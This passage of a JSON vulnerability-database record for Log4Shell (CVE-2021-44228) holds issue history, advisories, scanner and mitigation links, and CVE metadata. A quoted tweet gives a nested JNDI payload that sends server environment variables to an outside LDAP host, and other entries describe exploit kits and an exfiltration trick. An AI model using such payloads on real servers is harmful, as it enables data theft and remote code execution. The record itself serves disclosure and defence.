are unlikely to be using it. 
Those who are will need to specify -Dlog4j2.enableJndi=true or the environment variable form of it to use any JNDI components.", "name": "LOG4J2-3208 Disable JNDI by default", "tags": [ "timeline" ], "timestamp": "2021-12-11", "type": "EVIDENCE", "url": "https://issues.apache.org/jira/browse/LOG4J2-3208" }, { "content": "LDAP needs to be limited in the servers and classes it can access. JNDI should only support the java, ldap, and ldaps protocols by default.", "name": "LOG4J2-3201 Limit the protocols jNDI can use and restrict LDAP.", "tags": [ "timeline" ], "timestamp": "2021-12-05", "type": "EVIDENCE", "url": "https://issues.apache.org/jira/browse/LOG4J2-3201" }, { "content": "As opposed to setting \"%m {nolookups}\" in all pattern definitions, I would like to globally disable the feature", "name": "LOG4J2-2109 Add property to disable message pattern converter lookups", "tags": [ "timeline" ], "timestamp": "2017-11-09T13:25", "type": "EVIDENCE", "url": "https://issues.apache.org/jira/browse/LOG4J2-2109" }, { "content": "In page \"Configuration\", section \"Property Substitution\", it would be nice to add \"jndi\" context in the table listing all possible contexts. Because natively, log4j2 supports property substitution using jndi variables. It\u0027s too bad to not mention it into documentation.", "name": "LOG4J2-1133 In page \"Configuration\", section \"Property Substitution\", add \"jndi\" context", "tags": [ "timeline" ], "timestamp": "2015-09-15T16:58", "type": "EVIDENCE", "url": "https://issues.apache.org/jira/browse/LOG4J2-1133" }, { "content": "Currently, Lookup plugins [1] don\u0027t support JNDI resources. It would be really convenient to support JNDI resource lookup in the configuration. One use case with JNDI lookup plugin is as follows: I\u0027d like to use RoutingAppender [2] to put all the logs from the same web application context in a log file (a log file per web application context). 
And, I want to use JNDI resources look up to determine the target route (similarly to JNDI context selector of logback [3]). Determining the target route by JNDI lookup can be advantageous because we don\u0027t have to add any code to set properties for the thread context and JNDI lookup should always work even in a separate thread without copying thread context variables.", "name": "LOG4J2-313 JNDI Lookup plugin support", "tags": [ "timeline" ], "timestamp": "2013-07-17", "type": "EVIDENCE", "url": "https://issues.apache.org/jira/browse/LOG4J2-313" }, { "name": "Log4Shell scanner for Burp Suite", "type": "EVIDENCE", "url": "https://github.com/silentsignal/burp-log4shell" }, { "name": "https://blog.silentsignal.eu/2021/12/12/our-new-tool-for-enumerating-hidden-log4shell-affected-hosts/", "type": "EVIDENCE", "url": "https://blog.silentsignal.eu/2021/12/12/our-new-tool-for-enumerating-hidden-log4shell-affected-hosts/" }, { "name": "https://twitter.com/_StaticFlow_/status/1469358229767475205", "timestamp": "2021-12-10T18:27", "type": "EVIDENCE", "url": "In case anyone hasn\u0027t discovered this. The Log4J formatting is nestable which means payloads like \"${jndi:ldap://${env:user}.xyz.collab.com/a}\" Will leak server side env vars!" }, { "name": "Panorama 10.1 OSS Listing", "type": "ADVISORY", "url": "https://docs.paloaltonetworks.com/oss-listings/panorama-oss-listings/panorama-10-1-open-source-software-oss-listing.html" }, { "name": "UniFi Network Application 6.5.54", "type": "ADVISORY", "url": "https://community.ui.com/releases/UniFi-Network-Application-6-5-54/d717f241-48bb-4979-8b10-99db36ddabe1" }, { "name": "https://twitter.com/tnpitsecurity/status/1469429810216771589", "timestamp": "2021-12-10T11:12", "type": "ADVISORY", "url": "e can confirm that VMWare vCenter is affected by the Log4j vulnerability. 
#log4j #vcenter #Log4Shell" }, { "name": "https://github.com/xiajun325/apache-log4j-rce-poc", "type": "EVIDENCE", "url": "https://github.com/xiajun325/apache-log4j-rce-poc" }, { "name": "https://www.reddit.com/r/crowdstrike/comments/rda0ls/20211210_cool_query_friday_hunting_apache_log4j/", "type": "EVIDENCE", "url": "https://www.reddit.com/r/crowdstrike/comments/rda0ls/20211210_cool_query_friday_hunting_apache_log4j/" }, { "name": "https://github.com/PortSwigger/active-scan-plus-plus/commit/b485a0744140533d877ce244603502b42f9c6656", "type": "EVIDENCE", "url": "https://github.com/PortSwigger/active-scan-plus-plus/commit/b485a0744140533d877ce244603502b42f9c6656" }, { "content": "You can run these queries on @sourcegraph to determine the scope of impact of the log4j 0-day on your code:", "name": "https://twitter.com/beyang/status/1469171471784329219", "type": "EVIDENCE", "url": "https://twitter.com/beyang/status/1469171471784329219" }, { "name": "https://semgrep.dev/r?q=log4j-message-lookup-injection", "type": "EVIDENCE", "url": "https://semgrep.dev/r?q=log4j-message-lookup-injection" }, { "name": "https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j", "type": "EVIDENCE", "url": "https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j" }, { "name": "https://www.reddit.com/r/netsec/comments/rcwws9/rce_0day_exploit_found_in_log4j_a_popular_java/", "type": "EVIDENCE", "url": "https://www.reddit.com/r/netsec/comments/rcwws9/rce_0day_exploit_found_in_log4j_a_popular_java/" }, { "name": "https://www.govcert.admin.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/", "type": "EVIDENCE", "url": "https://www.govcert.admin.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/" }, { "name": "CISA Creates Webpage for Apache Log4j Vulnerability CVE-2021-44228", "type": "EVIDENCE", "url": 
"https://www.cisa.gov/uscert/ncas/current-activity/2021/12/13/cisa-creates-webpage-apache-log4j-vulnerability-cve-2021-44228" }, { "name": "CISA - Apache Log4j Vulnerability Guidance", "type": "EVIDENCE", "url": "https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance" }, { "name": "CISA Log4j (CVE-2021-44228) Vulnerability Guidance", "type": "EVIDENCE", "url": "https://github.com/cisagov/log4j-affected-db" }, { "name": "The FTC Wants Companies to Find Log4j Fast. It Won\u0027t Be Easy", "type": "ARTICLE", "url": "https://www.wired.com/story/lo4j-ftc-vulnerability/" }, { "name": "CISA director: We\u0027ll be dealing with Log4j for a long time", "type": "ARTICLE", "url": "https://www.cnet.com/tech/services-and-software/cisa-director-well-be-dealing-with-log4j-for-a-long-time/#ftag=CAD590a51e" }, { "content": "Subject: Entrust Cloud Services response to Log4J Vulnerability\n Message Group: Security Vulnerabilities\nMessage Expiry Date: 1/31/22\nOn December 10, 2021, details emerged about a critical remote code execution vulnerability in Apache Log4j, assigned as CVE-2021-44228, in which users who can cause specifically crafted strings to be processed by an application\u0027s Log4j logging layer may be able to execute code and thereby take control of the server hosting the affected application. The official security advisory from Apache can be found here: https://logging.apache.org/log4j/2.x/security.html\n\n Entrust has investigated the impact of CVE-2021-44228 in all of our hosted services. Entrust is continuing to monitor and asses ongoing product impacts and will perform additional actions as necessary. Product-specific details known at the time of writing are below.\n\n Impact of Vulnerability:\n\n Entrust Certificate Services:\n Entrust Certificate Services has sufficiently strong network controls to prevent direct exploitation. Additionally, Entrust has performed mitigations consistent with the Apache Log4j advisory. 
Note that the on-premise Discovery Agent component is affected, and is covered in Entrust Security Bulletin E21-008. Discovery Agent is out of support and superseded by Entrust Discovery Scanner, which is not affected.\n\n PKI as a Service (PKIaaS):\n Entrust has performed mitigations on PKI as a Service (PKIaaS) consistent with the Apache Log4j advisory, and additionally is applying product patches to update Log4j to version 2.15 or later. \n\n Remote Signing Service:\n Remote Signing Service has sufficiently strong network controls and has incoming data validation that prevent direct exploitation. Entrust is applying product patches to update Log4j to version 2.15 or later. \n\n Signing Automation Service:\n Entrust has performed mitigations for Signing Automation Service consistent with the Apache Log4j advisory, and additionally will apply product patches to update Log4j to version 2.15 as the patches become available.\n\n Ongoing Mitigating Efforts:\n Entrust is monitoring our hosted services for exploit attempts related to this vulnerability, and will take additional action as necessary. For all environments listed above, Entrust has initiated a review and mitigation process with its vendors supplying 3rd party products used in these environments, and will take actions as necessary.\n\n Corrective Action:\n No customer action is required at this time. 
Further information will be communicated in product-specific bulletins as necessary.", "name": "donotreply@entrust.com - Certificate Services Message Center - Entrust Cloud Services response to Log4J Vulnerability", "timestamp": "2021-12-13", "type": "EVIDENCE", "url": "" }, { "content": "Malware being delivered by #log4j base64 encoded two payloads serving ELF 32-bit LSB executable, Intel 80386 sha256sum a4b278170b0cb798ec930938b5bd45bbf12370a1ccb31a2bee6b2c406d881df6 contains many layer 4 and layer 7 attack functions", "name": "https://twitter.com/_larry0/status/1470362325463015428", "timestamp": "2021-12-13", "type": "EVIDENCE", "url": "https://twitter.com/_larry0/status/1470362325463015428" }, { "content": "Just added support to LDAP Serialized Payloads in the JNDI-Exploit-Kit. This attack path works in *ANY* java version as long the classes used in the Serialized payload are in the application classpath. Do not rely on your java version being up-to-date and update your log4j ASAP!", "name": "https://twitter.com/marcioalm/status/1470361495405875200", "timestamp": "2021-12-13", "type": "EVIDENCE", "url": "https://twitter.com/marcioalm/status/1470361495405875200" }, { "name": "https://www.reddit.com/r/sysadmin/comments/reqc6f/log4j_0day_being_exploited_mega_thread_overview/", "type": "EVIDENCE", "url": "https://www.reddit.com/r/sysadmin/comments/reqc6f/log4j_0day_being_exploited_mega_thread_overview/" }, { "name": "ABC News - New cyber vulnerability poses \u0027severe risk,\u0027 DHS says", "type": "EVIDENCE", "url": "https://abcnews.go.com/US/cyber-vulnerability-poses-severe-risk-dhs/story?id=81713422" }, { "content": "This repo contains operational information regarding the vulnerability in the Log4j logging library (CVE-2021-44228).", "name": "Log4j Vulnerability (CVE-2021-44228)", "type": "EVIDENCE", "url": "https://github.com/NCSC-NL/log4shell" }, { "name": "Technologies using Apache Log4j", "type": "EVIDENCE", "url": 
"https://gist.github.com/noperator/d360de81c061bc9c628b12d3f0e1e479" }, { "name": "Comments on the CVE-2021-44228 vulnerability", "type": "EVIDENCE", "url": "http://slf4j.org/log4shell.html" }, { "name": "https://www.ncsc.nl/actueel/advisory?id=NCSC-2021-1052", "type": "EVIDENCE", "url": "https://www.ncsc.nl/actueel/advisory?id=NCSC-2021-1052" }, { "content": "Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload.", "name": "nse-log4shell", "type": "EVIDENCE", "url": "https://github.com/Diverto/nse-log4shell" }, { "content": "log4shell.tools is a tool allows you to run a test to check whether one of your applications is affected by a vulnerability in log4j: CVE-2021-44228.", "name": "log4shell.tools", "type": "EVIDENCE", "url": "https://github.com/alexbakker/log4shell-tools" }, { "content": "fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts", "name": "log4j-scan", "type": "EVIDENCE", "url": "https://github.com/fullhunt/log4j-scan" }, { "content": "Simple Python 3 script to detect the \"Log4j\" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading", "name": "log4j-detect", "type": "EVIDENCE", "url": "https://github.com/takito1812/log4j-detect" }, { "name": "Log4Shell: Reconnaissance and post exploitation network detection", "type": "EVIDENCE", "url": "https://research.nccgroup.com/2021/12/12/log4shell-reconnaissance-and-post-exploitation-network-detection/" }, { "name": "https://musana.net/2021/12/13/log4shell-Quick-Guide/", "type": "EVIDENCE", "url": "https://musana.net/2021/12/13/log4shell-Quick-Guide/" }, { "name": "https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/", "type": "EVIDENCE", "url": 
"https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/" }, { "content": "", "name": "https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/", "timestamp": "", "type": "EVIDENCE", "url": "https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/" }, { "content": "This is a forked modified version of the great exploitation tool created by @welk1n (https://github.com/welk1n/JNDI-Injection-Exploit). Here is what I\u0027ve updated on his tool:\n\n Added support to serialized java payloads to LDAP payloads. This allows exploitation of any java version as long the classes are present in the application classpath ignoring completely the trustURLCodebase=false.", "name": "JNDI-Exploit-Kit", "type": "EVIDENCE", "url": "https://github.com/pimps/JNDI-Exploit-Kit" }, { "content": "JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server,LDAP server and HTTP server. 
RMI server and LDAP server are based on marshals and modified further to link with HTTP server.", "name": "JNDI-Injection-Exploit", "type": "EVIDENCE", "url": "https://github.com/welk1n/JNDI-Injection-Exploit" }, { "name": "Google Cloud recommendations for investigating and responding to the Apache \u201cLog4j 2\u201d vulnerability (CVE-2021-44228)", "type": "EVIDENCE", "url": "https://cloud.google.com/blog/products/identity-security/recommendations-for-apache-log4j2-vulnerability" }, { "name": "Google Cloud IDS signature updates to help detect CVE-2021-44228 Apache Log4j vulnerability", "type": "EVIDENCE", "url": "https://cloud.google.com/blog/products/identity-security/cloud-ids-to-help-detect-cve-2021-44228-apache-log4j-vulnerability" }, { "name": "Log4Shell Hell: anatomy of an exploit outbreak", "type": "EVIDENCE", "url": "https://news.sophos.com/en-us/2021/12/12/log4shell-hell-anatomy-of-an-exploit-outbreak/" }, { "name": "https://nakedsecurity.sophos.com/2021/12/13/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it/", "type": "EVIDENCE", "url": "https://nakedsecurity.sophos.com/2021/12/13/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it/" }, { "name": "Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited", "type": "EVIDENCE", "url": "https://www.trendmicro.com/en_us/research/21/l/patch-now-apache-log4j-vulnerability-called-log4shell-being-acti.html" }, { "name": "Inside the Log4j2 vulnerability (CVE-2021-44228)", "type": "EVIDENCE", "url": "https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/" }, { "name": "http://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html", "type": "EVIDENCE", "url": "http://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html" }, { "name": "https://research.kudelskisecurity.com/2021/12/10/log4shell-critical-severity-apache-log4j-remote-code-execution-being-actively-exploited-cve-2021-44228/", "type": 
"EVIDENCE", "url": "https://research.kudelskisecurity.com/2021/12/10/log4shell-critical-severity-apache-log4j-remote-code-execution-being-actively-exploited-cve-2021-44228/" }, { "name": "Remote code injection in Log4j", "type": "EVIDENCE", "url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q" }, { "name": "PSA: Log4Shell and the current state of JNDI injection", "type": "EVIDENCE", "url": "https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/" }, { "name": "Widespread Exploitation of Critical Remote Code Execution in Apache Log4j", "type": "EVIDENCE", "url": "https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/" }, { "name": "https://isc.sans.edu/diary/rss/28120", "type": "EVIDENCE", "url": "https://isc.sans.edu/diary/rss/28120" }, { "name": "https://www.veracode.com/blog/security-news/urgent-analysis-and-remediation-guidance-log4j-zero-day-rce-cve-2021-44228", "type": "EVIDENCE", "url": "https://www.veracode.com/blog/security-news/urgent-analysis-and-remediation-guidance-log4j-zero-day-rce-cve-2021-44228" }, { "name": "https://www.blumira.com/cve-2021-44228-log4shell/", "type": "EVIDENCE", "url": "https://www.blumira.com/cve-2021-44228-log4shell/" }, { "name": "https://news.ycombinator.com/item?id=29542896", "type": "EVIDENCE", "url": "https://news.ycombinator.com/item?id=29542896" }, { "content": "Interesting Log4j payload I discovered, simply omit the closing brace }, and now you will potentially get a bunch of data exfiltrated to your server until the next } appears in that data. 
Had it work on a FANG target", "name": "https://twitter.com/TomAnthonySEO/status/1470374984749133825", "timestamp": "2021-12-13", "type": "EVIDENCE", "url": "https://twitter.com/TomAnthonySEO/status/1470374984749133825" }, { "content": "A Byte Buddy Java agent-based fix for CVE-2021-44228, the log4j 2.x \"JNDI LDAP\" vulnerability.\n\nIt does three things:\n\n* Disables the internal method handler for jndi: format strings (\"lookups\").\n* Logs a message to System.err (i.e stderr) indicating that a log4j JNDI attempt has been made (including the format string attempted, with any ${} characters sanitized to prevent transitive injections).\n* Resolves the format string to \"(log4j jndi disabled)\" in the log message (to prevent transitive injections).", "name": "log4j-jndi-be-gone", "type": "FIX", "url": "https://github.com/nccgroup/log4j-jndi-be-gone" }, { "name": "Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration", "type": "EVIDENCE", "url": "https://blog.cloudflare.com/exploitation-of-cve-2021-44228-before-public-disclosure-and-evolution-of-waf-evasion-patterns/" }, { "content": "A fast firewall reverse proxy with TLS (HTTPS) and swarm support for preventing Log4J (Log4Shell aka CVE-2021-44228) attacks.", "name": "log4jail", "type": "EVIDENCE", "url": "https://github.com/mufeedvh/log4jail" }, { "name": "https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/", "type": "EVIDENCE", "url": "https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/" }, { "name": "https://github.com/jfrog/log4j-tools", "type": "EVIDENCE", "url": "https://github.com/jfrog/log4j-tools" }, { "name": "https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/", "type": "EVIDENCE", "url": "https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/" }, { "name": "https://research.nccgroup.com/2021/12/12/log4j-jndi-be-gone-a-simple-mitigation-for-cve-2021-44228/", "type": "EVIDENCE", "url": 
"https://research.nccgroup.com/2021/12/12/log4j-jndi-be-gone-a-simple-mitigation-for-cve-2021-44228/" }, { "name": "https://blog.cloudflare.com/log4j-cloudflare-logs-mitigation/", "type": "EVIDENCE", "url": "https://blog.cloudflare.com/log4j-cloudflare-logs-mitigation/" }, { "content": "Log4Shell RCE Exploit - fully independent exploit does not require any 3rd party binaries. The exploit spraying the payload to all possible logged HTTP Headers such as X-Forwarding , Server-IP , User-Agent", "name": "https://github.com/cyberstruggle/L4sh", "type": "EVIDENCE", "url": "https://github.com/cyberstruggle/L4sh" }, { "name": "https://www.catonetworks.com/blog/log4j-a-look-into-threat-actors-exploitation-attempts/", "type": "EVIDENCE", "url": "https://www.catonetworks.com/blog/log4j-a-look-into-threat-actors-exploitation-attempts/" }, { "name": "https://www.wired.com/story/log4j-log4shell/", "type": "WEB", "url": "https://www.wired.com/story/log4j-log4shell/" }, { "name": "https://www.theregister.com/2021/12/13/log4j_rce_latest/", "type": "WEB", "url": "https://www.theregister.com/2021/12/13/log4j_rce_latest/" }, { "content": "This is a dirty hack spring boot hello world proejct to test your tooling/payloads/detection capabilities locally before you hit production targets with them.\n\nThe configured Log4j version is 2.13.0", "name": "https://github.com/zsolt-halo/Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service", "type": "EVIDENCE", "url": "https://github.com/zsolt-halo/Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service" }, { "name": "https://chasersystems.com/discrimiNAT/blog/log4shell-and-its-traces-in-a-network-egress-filter/", "type": "EVIDENCE", "url": "https://chasersystems.com/discrimiNAT/blog/log4shell-and-its-traces-in-a-network-egress-filter/" }, { "name": "https://www.theregister.com/2021/12/15/log4j_latest_cisa/", "type": "WEB", "url": "https://www.theregister.com/2021/12/15/log4j_latest_cisa/" }, { "content": "This tool provides you with the 
ability to scan internal (only) subnets for vulnerable log4j web services. It will attempt to send a JNDI payload to each discovered web service (via the methods outlined below) to a list of common HTTP/S ports. For every response it receives, it will log the responding host IP so we can get a list of the vulnerable servers.\n\nIf there is a \"SUCCESS\", this means that some web service has received the request, was vulnerable to the log4j exploit and sent a request to our TCP server.\n\nThe tool does not send any exploits to the vulnerable hosts, and is designed to be as passive as possible.", "name": "log4jScanner", "type": "EVIDENCE", "url": "https://github.com/proferosec/log4jScanner" }, { "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/17/cisa-issues-ed-22-02-directing-federal-agencies-mitigate-apache", "type": "EVIDENCE", "url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/17/cisa-issues-ed-22-02-directing-federal-agencies-mitigate-apache" }, { "name": "https://www.cisa.gov/emergency-directive-22-02", "type": "EVIDENCE", "url": "https://www.cisa.gov/emergency-directive-22-02" }, { "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/22/mitigating-log4shell-and-other-log4j-related-vulnerabilities", "type": "ARTICLE", "url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/22/mitigating-log4shell-and-other-log4j-related-vulnerabilities" }, { "name": "https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/", "type": "ARTICLE", "url": "https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/" }, { "name": "https://therecord.media/google-more-than-35000-java-packages-impacted-by-log4j-vulnerabilities/", "type": "ARTICLE", "url": "https://therecord.media/google-more-than-35000-java-packages-impacted-by-log4j-vulnerabilities/" }, { "name": "https://twitter.com/erratarob/status/1475247078066450432", "type": "EVIDENCE", "url": 
"https://twitter.com/erratarob/status/1475247078066450432" }, { "name": "https://www.msn.com/en-xl/news/other/apache-log4j-bug-china-e2-80-99s-industry-ministry-pulls-support-from-alibaba-cloud-for-not-reporting-flaw-to-government-first/ar-AAS2Rht", "type": "ARTICLE", "url": "https://www.msn.com/en-xl/news/other/apache-log4j-bug-china-e2-80-99s-industry-ministry-pulls-support-from-alibaba-cloud-for-not-reporting-flaw-to-government-first/ar-AAS2Rht" }, { "name": "https://twitter.com/beauwoods/status/1479118516829622275?s=11", "type": "EVIDENCE", "url": "https://twitter.com/beauwoods/status/1479118516829622275?s=11" }, { "name": "https://4jfinder.github.io/", "type": "EVIDENCE", "url": "https://4jfinder.github.io/" }, { "name": "Neutralizing Your Inputs: A Log4Shell Weakness Story", "type": "ARTICLE", "url": "https://medium.com/@CWE_CAPEC/neutralizing-your-inputs-a-log4shell-weakness-story-89954c8b25c9" }, { "name": "Four million outdated Log4j downloads were served from Apache Maven Central alone despite vuln publicity blitz", "type": "ARTICLE", "url": "https://www.theregister.com/2022/01/11/outdated_log4j_downloads/" }, { "name": "Sonatype Log4j Download Dashboard", "type": "ARTICLE", "url": "https://www.sonatype.com/resources/log4j-vulnerability-resource-center" } ], "reporter": "kurtseifried", "reporter_id": 582211, "vendor_name": "Apache", "vulnerability_type": [ "CWE-502 Deserialization of Untrusted Data", "CWE-400 Uncontrolled Resource Consumption", "CWE-20 Improper Input Validation" ] }, "gsd": { "metadata": { "exploitCode": "unknown", "remediation": "unknown", "reportConfidence": "confirmed", "type": "vulnerability" }, "osvSchema": { "aliases": [ "CVE-2021-44228" ], "details": "Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. 
An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.", "id": "GSD-2021-44228", "modified": "2023-12-13T01:23:20.725867Z", "schema_version": "1.4.0" } }, "namespaces": { "cisa.gov": { "cveID": "CVE-2021-44228", "dateAdded": "2021-12-10", "dueDate": "2021-12-24", "product": "Log4j2", "requiredAction": "For all affected software assets for which updates exist, the only acceptable remediation actions are: 1) Apply updates; OR 2) remove affected assets from agency networks. Temporary mitigations using one of the measures provided at https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures are only acceptable until updates are available.", "shortDescription": "Apache Log4j2 contains a vulnerability where JNDI features do not protect against attacker-controlled JNDI-related endpoints, allowing for remote code execution.", "vendorProject": "Apache", "vulnerabilityName": "Apache Log4j2 Remote Code Execution Vulnerability" }, "cve.org": { "CVE_data_meta": { "ASSIGNER": "security@apache.org", "ID": "CVE-2021-44228", "STATE": "PUBLIC", "TITLE": "Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Apache Log4j2", "version": { "version_data": [ { "version_affected": "\u003e=", "version_name": "log4j-core", "version_value": "2.0-beta9" }, { "version_affected": "\u003c", "version_name": "log4j-core", "version_value": "2.3.1" }, { "version_affected": "\u003e=", "version_name": "log4j-core", 
"version_value": "2.4" }, { "version_affected": "\u003c", "version_name": "log4j-core", "version_value": "2.12.2" }, { "version_affected": "\u003e=", "version_name": "log4j-core", "version_value": "2.13.0" }, { "version_affected": "\u003c", "version_name": "log4j-core", "version_value": "2.15.0" } ] } } ] }, "vendor_name": "Apache Software Foundation" } ] } }, "credit": [ { "lang": "eng", "value": "This issue was discovered by Chen Zhaojun of Alibaba Cloud Security Team." } ], "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects." 
} ] }, "generator": { "engine": "Vulnogram 0.0.9" }, "impact": [ { "other": "critical" } ], "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-502 Deserialization of Untrusted Data" } ] }, { "description": [ { "lang": "eng", "value": "CWE-400 Uncontrolled Resource Consumption" } ] }, { "description": [ { "lang": "eng", "value": "CWE-20 Improper Input Validation" } ] } ] }, "references": { "reference_data": [ { "name": "https://logging.apache.org/log4j/2.x/security.html", "refsource": "MISC", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "name": "[oss-security] 20211210 CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints", "refsource": "MLIST", "url": "http://www.openwall.com/lists/oss-security/2021/12/10/1" }, { "name": "[oss-security] 20211210 Re: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints", "refsource": "MLIST", "url": "http://www.openwall.com/lists/oss-security/2021/12/10/2" }, { "name": "20211210 Vulnerability in Apache Log4j Library Affecting Cisco Products: December 2021", "refsource": "CISCO", "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd" }, { "name": "[oss-security] 20211210 Re: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints", "refsource": "MLIST", "url": "http://www.openwall.com/lists/oss-security/2021/12/10/3" }, { "name": "https://security.netapp.com/advisory/ntap-20211210-0007/", "refsource": "CONFIRM", "url": "https://security.netapp.com/advisory/ntap-20211210-0007/" }, { "name": "https://security.netapp.com/advisory/ntap-20211210-0007/", "refsource": "CONFIRM", "url": "https://security.netapp.com/advisory/ntap-20211210-0007/" }, { "name": 
"http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html" }, { "name": "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html" }, { "name": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032", "refsource": "CONFIRM", "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032" }, { "name": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032", "refsource": "CONFIRM", "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032" }, { "name": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html", "refsource": "CONFIRM", "url": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html" }, { "name": "DSA-5020", "refsource": "DEBIAN", "url": "https://www.debian.org/security/2021/dsa-5020" }, { "name": "[debian-lts-announce] 20211212 [SECURITY] [DLA 2842-1] apache-log4j2 security update", "refsource": "MLIST", "url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html" }, { "name": "FEDORA-2021-f0f501d01f", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/" }, { "name": "Microsoft\u2019s Response to CVE-2021-44228 Apache Log4j 2", "refsource": "MS", "url": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/" }, { "name": "[oss-security] 20211213 Re: CVE-2021-4104: Deserialization of untrusted data in JMSAppender in Apache Log4j 1.2", "refsource": "MLIST", "url": "http://www.openwall.com/lists/oss-security/2021/12/13/2" }, { "name": "[oss-security] 20211213 CVE-2021-4104: Deserialization of untrusted data in JMSAppender 
